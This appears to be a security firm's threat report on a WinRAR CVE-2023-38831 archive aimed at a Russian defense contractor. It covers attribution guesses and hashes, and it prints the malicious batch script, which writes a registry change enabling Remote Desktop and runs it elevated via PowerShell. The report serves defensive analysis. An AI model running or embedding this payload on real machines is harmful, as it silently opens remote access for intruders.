threat-analysis

Malware Targeting a Russian Defense Contractor

Findings Summary: Malware Targeting a Russian Defense Contractor

On 14 December, DeepSeas automated scanning and analysis encountered a unique piece of malware targeting a Russian defense contractor on VirusTotal. The file in question, listed as 567000-13.rar, contains a .PDF file of the same name, which was likely directed toward an engineer at a Russian defense industrial base organization and detailed a part for a nuclear weapons system. Further review determined that the sender was masquerading as the CEO of a Russian defense contractor. The part for the weapons system mentioned in the body of the .PDF was stated to be “for a strategic nuclear system,” suggesting, with the vague language given, that the creators of the malware may be a part of a hacktivist or nation-state group opposed to Russia. DeepSeas does not believe however that the sender is from Ukraine, as may be first assumed, but a country that would be more interested in Russia’s strategic arsenal. This may include nations such as China, North Korea, or Iran.

Technical Summary

The malware targeting a Russian defense contractor abuses the CVE-2023-38831 vulnerability, which is specified by the National Institute of Standards and Technology (NIST)’s National Vulnerability Database (NVD) as an arbitrary code vulnerability in RARLAB’s WinRAR in versions prior to v6.23.[i] An attack may utilize this vulnerability to hide a folder that may be full of malware within a .ZIP with the same name as the benign file within a RAR archive. When a victim tries to access the benign file with this vulnerability, the contents of the folder are processed instead. This vulnerability has a CVSS score of 7.8, ranking it relatively high in severity, though it falls short of the more serious 9.0 and higher severity rankings.

Provided the attackers were successful in tricking the victim into opening the contents of the RAR file, the victim would not notice anything unusual. However, in the background the payload would have enabled Windows’ native Remote Desktop Protocol (RDP) on the victim’s device. No other indications of malicious activity were noted; no additional payloads or tools were decoded, compiled, retrieved, dropped, installed, or executed. The only activity observed was the enabling of RDP on the affected device, making this an interesting case of a targeted attack with extremely limited goals.

DeepSeas Analysis: Malware Targeting a Russian Defense Contractor

The lack of a follow-on payload for this attack strongly suggests that the attackers were not attempting to gain initial access to their target’s network. While the possibility exists that the attackers had obtained valid credentials and merely required RDP be enabled to continue their operations, the analysts at DeepSeas consider this possibility to be slim. More likely is that the attackers were already active in their targets’ networks and required RDP be enabled to facilitate the exfiltration of sensitive data or potentially to deliver additional payloads in a more secure manner. Though this could have been done using administrator credentials, the attackers may not have had access to these credentials and operating instead with the credentials of a lower-privileged user.

Get to Know DeepSeas

Over the past several years, DeepSeas has observed several attacks against companies in the Russian defense industrial base, including companies involved in the design and construction of Russian ballistic missile submarines, government entities, manufacturers of Russian armored vehicles, and others. DeepSeas has not observed any indications that the malware overlaps with any other known nation-state group and cannot authoritatively attribute this attack to any nation or group. Previous attacks against the Russian defense industrial base were attributed to North Korean actors, proving not only that there is no honor among thieves, but that in the world of espionage everyone is a valid target. Given North Korea’s recent efforts to improve their ballistic missile technology it is entirely possible that this attack may be the work of Pyongyang, though until further information comes to light it will be difficult to provide more authoritative attribution.

Technical Details

5670001-13.pdf File Details

<</Title<FEFF004D006F006400650072006E00200062007500730069006E0065007300730020006C00650074007400650072002000730061006E0073002D00730065007200690066>/Creator<FEFF005700720069007400650072>/Producer<FEFF004C0069006200720065004F0066006600690063006500200037002E0034>/CreationDate(D:20230908022632+03’00’)>>

 

Language: ru-RUTitle: Modern business letter sans-serifCreator: WriterProducer: LibreOffice 7.4Create Date: 2023:09:08 02:26:32+03:00

01.bat File Contents

@echo offecho @echo off > %appdata%\01.batecho reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f >> %appdata%\01.batpowershell -command “Start-Process -FilePath ’01.bat’ -WorkingDirectory ‘%appdata%’ -Verb RunAs”

Indicators of Compromise

c23d42f6e94b05f225267c4ea3b1a08aa947c77014faf866326e08c55196c4f6 567000-13.rar
9c5ac599b56bcda4dedd76ffa2572aca1e4e45088b851a43df39c2367ae6d6b8 5670001-13.pdf
4a56591a32a474acd45014efd878360733901f847f0a5a2f3fe4a4c0f73491f6 01.bat

[i] https://nvd.nist.gov/vuln/detail/CVE-2023-38831